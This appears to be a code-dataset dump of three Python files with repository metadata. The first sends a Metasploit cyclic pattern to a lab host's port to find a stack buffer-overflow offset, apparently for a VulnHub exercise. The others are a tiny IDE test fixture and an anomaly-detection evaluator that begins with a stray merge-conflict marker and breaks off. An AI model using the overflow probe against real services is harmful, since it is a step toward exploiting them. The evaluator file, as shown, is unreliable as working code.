hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
53db38d3d4792abb4e568a479428d537b001b0ca
| 2,156
|
py
|
Python
|
02_findingtheOffset.py
|
F-Masood/ExploitingBufferOverflows
|
9397dc2bc45255a50379cd105e8b4b6242993a4b
|
[
"MIT"
] | 3
|
2021-12-09T14:40:49.000Z
|
2022-02-22T04:21:07.000Z
|
02_findingtheOffset.py
|
F-Masood/Exploiting_StackBased_BufferOverflows
|
9397dc2bc45255a50379cd105e8b4b6242993a4b
|
[
"MIT"
] | null | null | null |
02_findingtheOffset.py
|
F-Masood/Exploiting_StackBased_BufferOverflows
|
9397dc2bc45255a50379cd105e8b4b6242993a4b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import sys,socket
#msf-pattern_create -l 1850 [vulnhub netstart by foxlox]
offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.10.51',2371))
s.send((offset))
s.close()
except:
print("Error connecting to server")
sys.exit()
| 119.777778
| 1,861
| 0.95269
| 47
| 2,156
| 43.638298
| 0.808511
| 0.011702
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.301474
| 0.024583
| 2,156
| 17
| 1,862
| 126.823529
| 0.673799
| 0.032931
| 0
| 0
| 0
| 0
| 0.906865
| 0.888142
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0.1
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53f083bccdcb5a3b0a7302a872a4cd92fc3e8ab0
| 35
|
py
|
Python
|
python/testData/refactoring/move/moveSymbolDoesntReorderImportsInOriginFile/after/src/other.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/move/moveSymbolDoesntReorderImportsInOriginFile/after/src/other.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/refactoring/move/moveSymbolDoesntReorderImportsInOriginFile/after/src/other.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
import b
def func():
print(b)
| 7
| 12
| 0.571429
| 6
| 35
| 3.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 35
| 5
| 12
| 7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
071ad13101052b7cb3fd2d4fd950c1005dc109a9
| 54,921
|
py
|
Python
|
src/evaluation/evaluator.py
|
agnes-yang/DeepADoTS
|
4a52caf4e49bad8e057649ca05ea9522c77518fb
|
[
"MIT"
] | null | null | null |
src/evaluation/evaluator.py
|
agnes-yang/DeepADoTS
|
4a52caf4e49bad8e057649ca05ea9522c77518fb
|
[
"MIT"
] | null | null | null |
src/evaluation/evaluator.py
|
agnes-yang/DeepADoTS
|
4a52caf4e49bad8e057649ca05ea9522c77518fb
|
[
"MIT"
] | null | null | null |
<<<<<<< HEAD
import gc
import logging
import os
import pickle
import re
import sys
import traceback
from textwrap import wrap
import matplotlib.pyplot as plt
import matplotlib.patheffects as path_effects
from matplotlib.font_manager import FontProperties
import numpy as np
import pandas as pd
import progressbar
import time
from sklearn.metrics import accuracy_score, fbeta_score
from sklearn.metrics import precision_recall_fscore_support as prf
from sklearn.metrics import roc_curve, auc
from tabulate import tabulate
from .config import init_logging
class Evaluator:
def __init__(self, datasets: list, detectors: callable, output_dir: {str} = None, seed: int = None,
create_log_file=True):
"""
:param datasets: list of datasets
:param detectors: callable that returns list of detectors
"""
assert np.unique([x.name for x in datasets]).size == len(datasets), 'Some datasets have the same name!'
self.datasets = datasets
self._detectors = detectors
self.output_dir = output_dir or 'reports'
self.results = dict()
if create_log_file:
init_logging(os.path.join(self.output_dir, 'logs'))
self.logger = logging.getLogger(__name__)
# Dirty hack: Is set by the main.py to insert results from multiple evaluator runs
self.benchmark_results = None
# Last passed seed value in evaluate()
self.seed = seed
@property
def detectors(self):
detectors = self._detectors(self.seed)
assert np.unique([x.name for x in detectors]).size == len(detectors), 'Some detectors have the same name!'
return detectors
def set_benchmark_results(self, benchmark_result):
self.benchmark_results = benchmark_result
def export_results(self, name):
output_dir = os.path.join(self.output_dir, 'evaluators')
os.makedirs(output_dir, exist_ok=True)
timestamp = time.strftime('%Y-%m-%d-%H%M%S')
path = os.path.join(output_dir, f'{name}-{timestamp}.pkl')
self.logger.info(f'Store evaluator results at {os.path.abspath(path)}')
save_dict = {
'datasets': [x.name for x in self.datasets],
'detectors': [x.name for x in self.detectors],
'benchmark_results': self.benchmark_results,
'results': self.results,
'output_dir': self.output_dir,
'seed': int(self.seed),
}
with open(path, 'wb') as f:
pickle.dump(save_dict, f)
return path
# Import benchmark_results if this evaluator uses the same detectors and datasets
# self.results are not available because they are overwritten by each run
def import_results(self, name):
output_dir = os.path.join(self.output_dir, 'evaluators')
path = os.path.join(output_dir, f'{name}.pkl')
self.logger.info(f'Read evaluator results at {os.path.abspath(path)}')
with open(path, 'rb') as f:
save_dict = pickle.load(f)
self.logger.debug(f'Importing detectors {"; ".join(save_dict["detectors"])}')
my_detectors = [x.name for x in self.detectors]
assert np.array_equal(save_dict['detectors'], my_detectors), 'Detectors should be the same'
self.logger.debug(f'Importing datasets {"; ".join(save_dict["datasets"])}')
my_datasets = [x.name for x in self.datasets]
assert np.array_equal(save_dict['datasets'], my_datasets), 'Datasets should be the same'
self.benchmark_results = save_dict['benchmark_results']
self.seed = save_dict['seed']
self.results = save_dict['results']
@staticmethod
def get_accuracy_precision_recall_fscore(y_true: list, y_pred: list):
accuracy = accuracy_score(y_true, y_pred)
# warn_for=() avoids log warnings for any result being zero
precision, recall, f_score, _ = prf(y_true, y_pred, average='binary', warn_for=())
if precision == 0 and recall == 0:
f01_score = 0
else:
f01_score = fbeta_score(y_true, y_pred, average='binary', beta=0.1)
return accuracy, precision, recall, f_score, f01_score
@staticmethod
def get_auroc(det, ds, score):
if np.isnan(score).all():
score = np.zeros_like(score)
_, _, _, y_test = ds.data()
score_nonan = score.copy()
# Rank NaN below every other value in terms of anomaly score
score_nonan[np.isnan(score_nonan)] = np.nanmin(score_nonan) - sys.float_info.epsilon
fpr, tpr, _ = roc_curve(y_test, score_nonan)
return auc(fpr, tpr)
def get_optimal_threshold(self, det, y_test, score, steps=100, return_metrics=False):
maximum = np.nanmax(score)
minimum = np.nanmin(score)
threshold = np.linspace(minimum, maximum, steps)
metrics = list(self.get_metrics_by_thresholds(y_test, score, threshold))
metrics = np.array(metrics).T
anomalies, acc, prec, rec, f_score, f01_score = metrics
if return_metrics:
return anomalies, acc, prec, rec, f_score, f01_score, threshold
else:
return threshold[np.argmax(f_score)]
def evaluate(self):
for ds in progressbar.progressbar(self.datasets):
(X_train, y_train, X_test, y_test) = ds.data()
for det in progressbar.progressbar(self.detectors):
self.logger.info(f'Training {det.name} on {ds.name} with seed {self.seed}')
try:
det.fit(X_train.copy())
score = det.predict(X_test.copy())
self.results[(ds.name, det.name)] = score
try:
self.plot_details(det, ds, score)
except Exception:
pass
except Exception as e:
self.logger.error(f'An exception occurred while training {det.name} on {ds}: {e}')
self.logger.error(traceback.format_exc())
self.results[(ds.name, det.name)] = np.zeros_like(y_test)
gc.collect()
def benchmarks(self) -> pd.DataFrame:
df = pd.DataFrame()
for ds in self.datasets:
_, _, _, y_test = ds.data()
for det in self.detectors:
score = self.results[(ds.name, det.name)]
y_pred = self.binarize(score, self.get_optimal_threshold(det, y_test, np.array(score)))
acc, prec, rec, f1_score, f01_score = self.get_accuracy_precision_recall_fscore(y_test, y_pred)
score = self.results[(ds.name, det.name)]
auroc = self.get_auroc(det, ds, score)
df = df.append({'dataset': ds.name,
'algorithm': det.name,
'accuracy': acc,
'precision': prec,
'recall': rec,
'F1-score': f1_score,
'F0.1-score': f01_score,
'auroc': auroc},
ignore_index=True)
return df
def get_metrics_by_thresholds(self, y_test: list, score: list, thresholds: list):
for threshold in thresholds:
anomaly = self.binarize(score, threshold=threshold)
metrics = Evaluator.get_accuracy_precision_recall_fscore(y_test, anomaly)
yield (anomaly.sum(), *metrics)
def plot_scores(self, store=True):
detectors = self.detectors
plt.close('all')
figures = []
for ds in self.datasets:
X_train, y_train, X_test, y_test = ds.data()
subtitle_loc = 'left'
fig = plt.figure(figsize=(15, 15))
fig.canvas.set_window_title(ds.name)
sp = fig.add_subplot((2 * len(detectors) + 3), 1, 1)
sp.set_title('original training data', loc=subtitle_loc)
for col in X_train.columns:
plt.plot(X_train[col])
sp = fig.add_subplot((2 * len(detectors) + 3), 1, 2)
sp.set_title('original test set', loc=subtitle_loc)
for col in X_test.columns:
plt.plot(X_test[col])
sp = fig.add_subplot((2 * len(detectors) + 3), 1, 3)
sp.set_title('binary labels of test set', loc=subtitle_loc)
plt.plot(y_test)
subplot_num = 4
for det in detectors:
sp = fig.add_subplot((2 * len(detectors) + 3), 1, subplot_num)
sp.set_title(f'scores of {det.name}', loc=subtitle_loc)
score = self.results[(ds.name, det.name)]
plt.plot(np.arange(len(score)), [x for x in score])
threshold_line = len(score) * [self.get_optimal_threshold(det, y_test, np.array(score))]
plt.plot([x for x in threshold_line])
subplot_num += 1
sp = fig.add_subplot((2 * len(detectors) + 3), 1, subplot_num)
sp.set_title(f'binary labels of {det.name}', loc=subtitle_loc)
plt.plot(np.arange(len(score)),
[x for x in self.binarize(score, self.get_optimal_threshold(det, y_test, np.array(score)))])
subplot_num += 1
fig.subplots_adjust(top=0.9, hspace=0.4)
fig.tight_layout()
if store:
self.store(fig, f'scores_{ds.name}')
figures.append(fig)
return figures
def plot_threshold_comparison(self, steps=40, store=True):
detectors = self.detectors
plt.close('all')
plots_shape = len(detectors), len(self.datasets)
fig, axes = plt.subplots(*plots_shape, figsize=(len(detectors) * 15, len(self.datasets) * 5))
# Ensure two dimensions for iteration
axes = np.array(axes).reshape(*plots_shape).T
plt.suptitle('Compare thresholds', fontsize=10)
for ds, axes_row in zip(self.datasets, axes):
_, _, X_test, y_test = ds.data()
for det, ax in zip(detectors, axes_row):
score = np.array(self.results[(ds.name, det.name)])
anomalies, _, prec, rec, f_score, f01_score, thresh = self.get_optimal_threshold(
det, y_test, score, return_metrics=True)
ax.plot(thresh, anomalies / len(y_test),
label=fr'anomalies ({len(y_test)} $\rightarrow$ 1)')
ax.plot(thresh, prec, label='precision')
ax.plot(thresh, rec, label='recall')
ax.plot(thresh, f_score, label='f_score', linestyle='dashed')
ax.plot(thresh, f01_score, label='f01_score', linestyle='dashed')
ax.set_title(f'{det.name} on {ds.name}')
ax.set_xlabel('Threshold')
ax.legend()
# Avoid overlapping title and axis labels
plt.xlim([0.0, 1.0])
fig.subplots_adjust(top=0.9, hspace=0.4, right=1, left=0)
fig.tight_layout()
if store:
self.store(fig, 'metrics_by_thresholds')
return fig
def plot_roc_curves(self, store=True):
detectors = self.detectors
plt.close('all')
figures = []
for ds in self.datasets:
_, _, _, y_test = ds.data()
fig_scale = 3
fig = plt.figure(figsize=(fig_scale * len(detectors), fig_scale))
fig.canvas.set_window_title(ds.name + ' ROC')
fig.suptitle(f'ROC curve on {ds.name}', fontsize=14, y='1.1')
subplot_count = 1
for det in detectors:
self.logger.info(f'Plotting ROC curve for {det.name} on {ds.name}')
score = self.results[(ds.name, det.name)]
if np.isnan(score).all():
score = np.zeros_like(score)
# Rank NaN below every other value in terms of anomaly score
score[np.isnan(score)] = np.nanmin(score) - sys.float_info.epsilon
fpr, tpr, _ = roc_curve(y_test, score)
roc_auc = auc(fpr, tpr)
plt.subplot(1, len(detectors), subplot_count)
plt.plot(fpr, tpr, color='darkorange',
lw=2, label='area = %0.2f' % roc_auc)
subplot_count += 1
plt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.gca().set_aspect('equal', adjustable='box')
plt.title('\n'.join(wrap(det.name, 20)))
plt.legend(loc='lower right')
plt.tight_layout()
if store:
self.store(fig, f'roc_{ds.name}')
figures.append(fig)
return figures
def plot_auroc(self, store=True, title='AUROC'):
plt.close('all')
self.benchmark_results[['dataset', 'algorithm', 'auroc']].pivot(
index='algorithm', columns='dataset', values='auroc').plot(kind='bar')
plt.legend(loc=3, framealpha=0.5)
plt.xticks(rotation=20)
plt.ylabel('AUC', rotation='horizontal', labelpad=20)
plt.title(title)
plt.ylim(ymin=0, ymax=1)
plt.tight_layout()
if store:
self.store(plt.gcf(), 'auroc', store_in_figures=True)
def plot_details(self, det, ds, score, store=True):
if not det.details:
return
plt.close('all')
cmap = plt.get_cmap('inferno')
_, _, X_test, y_test = ds.data()
grid = 0
for value in det.prediction_details.values():
grid += 1 if value.ndim == 1 else value.shape[0]
grid += X_test.shape[1] # data
grid += 1 + 1 # score and gt
fig, axes = plt.subplots(grid, 1, figsize=(15, 1.5 * grid))
i = 0
c = cmap(i / grid)
axes[i].set_title('test data')
for col in X_test.values.T:
axes[i].plot(col, color=c)
i += 1
c = cmap(i / grid)
axes[i].set_title('test gt data')
axes[i].plot(y_test.values, color=c)
i += 1
c = cmap(i / grid)
axes[i].set_title('scores')
axes[i].plot(score, color=c)
i += 1
c = cmap(i / grid)
for key, values in det.prediction_details.items():
axes[i].set_title(key)
if values.ndim == 1:
axes[i].plot(values, color=c)
i += 1
elif values.ndim == 2:
for v in values:
axes[i].plot(v, color=c)
i += 1
else:
self.logger.warning('plot_details: not sure what to do')
c = cmap(i / grid)
fig.tight_layout()
if store:
self.store(fig, f'details_{det.name}_{ds.name}')
return fig
# create boxplot diagrams for auc values for each algorithm/dataset per algorithm/dataset
def create_boxplots(self, runs, data, detectorwise=True, store=True):
target = 'algorithm' if detectorwise else 'dataset'
grouped_by = 'dataset' if detectorwise else 'algorithm'
relevant_results = data[['algorithm', 'dataset', 'auroc']]
figures = []
for det_or_ds in (self.detectors if detectorwise else self.datasets):
relevant_results[relevant_results[target] == det_or_ds.name].boxplot(by=grouped_by, figsize=(15, 15))
plt.suptitle('') # boxplot() adds a suptitle
plt.title(f'AUC grouped by {grouped_by} for {det_or_ds.name} over {runs} runs')
plt.ylim(ymin=0, ymax=1)
plt.tight_layout()
figures.append(plt.gcf())
if store:
self.store(plt.gcf(), f'boxplot_auc_for_{det_or_ds.name}_{runs}_runs', store_in_figures=True)
return figures
# create bar charts for averaged pipeline results per algorithm/dataset
def create_bar_charts(self, runs, detectorwise=True, store=True):
target = 'algorithm' if detectorwise else 'dataset'
grouped_by = 'dataset' if detectorwise else 'algorithm'
relevant_results = self.benchmark_results[['algorithm', 'dataset', 'auroc']]
figures = []
for det_or_ds in (self.detectors if detectorwise else self.datasets):
relevant_results[relevant_results[target] == det_or_ds.name].plot(x=grouped_by, kind='bar', figsize=(7, 7))
plt.suptitle('') # boxplot() adds a suptitle
plt.title(f'AUC for {target} {det_or_ds.name} over {runs} runs')
plt.ylim(ymin=0, ymax=1)
plt.tight_layout()
figures.append(plt.gcf())
if store:
self.store(plt.gcf(), f'barchart_auc_for_{det_or_ds.name}_{runs}_runs', store_in_figures=True)
return figures
def store(self, fig, title, extension='pdf', no_counters=False, store_in_figures=False):
timestamp = time.strftime('%Y-%m-%d-%H%M%S')
if store_in_figures:
output_dir = os.path.join(self.output_dir, 'figures')
else:
output_dir = os.path.join(self.output_dir, 'figures', f'seed-{self.seed}')
os.makedirs(output_dir, exist_ok=True)
counters_str = '' if no_counters else f'-{len(self.detectors)}-{len(self.datasets)}'
path = os.path.join(output_dir, f'{title}{counters_str}-{timestamp}.{extension}')
fig.savefig(path)
self.logger.info(f'Stored plot at {path}')
def store_text(self, content, title, extension='txt'):
timestamp = int(time.time())
output_dir = os.path.join(self.output_dir, 'tables', f'seed-{self.seed}')
path = os.path.join(output_dir, f'{title}-{len(self.detectors)}-{len(self.datasets)}-{timestamp}.{extension}')
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, 'w') as f:
f.write(content)
self.logger.info(f'Stored {extension} file at {path}')
def print_merged_table_per_dataset(self, results):
for ds in self.datasets:
table = tabulate(results[results['dataset'] == ds.name], headers='keys', tablefmt='psql')
self.logger.info(f'Dataset: {ds.name}\n{table}')
def gen_merged_latex_per_dataset(self, results, title_suffix=None, store=True):
title = f'latex_merged{f"_{title_suffix}" if title_suffix else ""}'
content = ''
for ds in self.datasets:
content += f'''{ds.name}:\n\n{tabulate(results[results['dataset'] == ds.name],
headers='keys', tablefmt='latex')}\n\n'''
if store:
self.store_text(content=content, title=title, extension='tex')
return content
def print_merged_table_per_algorithm(self, results):
for det in self.detectors:
table = tabulate(results[results['algorithm'] == det.name], headers='keys', tablefmt='psql')
self.logger.info(f'Detector: {det.name}\n{table}')
def gen_merged_latex_per_algorithm(self, results, title_suffix=None, store=True):
title = f'latex_merged{f"_{title_suffix}" if title_suffix else ""}'
content = ''
for det in self.detectors:
content += f'''{det.name}:\n\n{tabulate(results[results['algorithm'] == det.name],
headers='keys', tablefmt='latex')}\n\n'''
if store:
self.store_text(content=content, title=title, extension='tex')
return content
@staticmethod
def translate_var_key(key_name):
if key_name == 'pol':
return 'Pollution'
if key_name == 'mis':
return 'Missing'
if key_name == 'extremeness':
return 'Extremeness'
if key_name == 'f':
return 'Multivariate'
# self.logger('Unexpected dataset name (unknown variable in name)')
return None
@staticmethod
def get_key_and_value(dataset_name):
# Extract var name and value from dataset name
var_re = re.compile(r'.+\((\w*)=(.*)\)')
# e.g. 'Syn Extreme Outliers (pol=0.1)'
match = var_re.search(dataset_name)
if not match:
# self.logger.warn('Unexpected dataset name (not variable in name)')
return '-', dataset_name
var_key = match.group(1)
var_value = match.group(2)
return Evaluator.translate_var_key(var_key), var_value
@staticmethod
def get_dataset_types(mi_df):
types = mi_df.index.get_level_values('Type')
indexes = np.unique(types, return_index=True)[1]
return [types[index] for index in sorted(indexes)]
@staticmethod
def insert_multi_index_yaxis(ax, mi_df):
type_title_offset = -1.6 # depends on string length of xaxis ticklabels
datasets = mi_df.index
dataset_types = Evaluator.get_dataset_types(mi_df) # Returns unique entries keeping original order
logging.getLogger(__name__).debug('Plotting heatmap for groups {" ".join(dataset_types)}')
ax.set_yticks(np.arange(len(datasets)))
ax.set_yticklabels([x[1] for x in datasets])
y_axis_title_pos = 0 # Store at which position we are for plotting the next title
for idx, dataset_type in enumerate(dataset_types):
section_frame = mi_df.iloc[mi_df.index.get_level_values('Type') == dataset_type]
# Somehow it's sorted by its occurence (which is what we want here)
dataset_levels = section_frame.index.remove_unused_levels().levels[1]
title_pos = y_axis_title_pos + 0.5 * (len(dataset_levels) - 1)
ax.text(type_title_offset, title_pos, dataset_type, ha='center', va='center', rotation=90,
fontproperties=FontProperties(weight='bold'))
if idx < len(dataset_types) - 1:
sep_pos = y_axis_title_pos + (len(dataset_levels) - 0.6)
ax.text(-0.5, sep_pos, '_' * int(type_title_offset * -10), ha='right', va='center')
y_axis_title_pos += len(dataset_levels)
@staticmethod
def to_multi_index_frame(evaluators):
evaluator = evaluators[0]
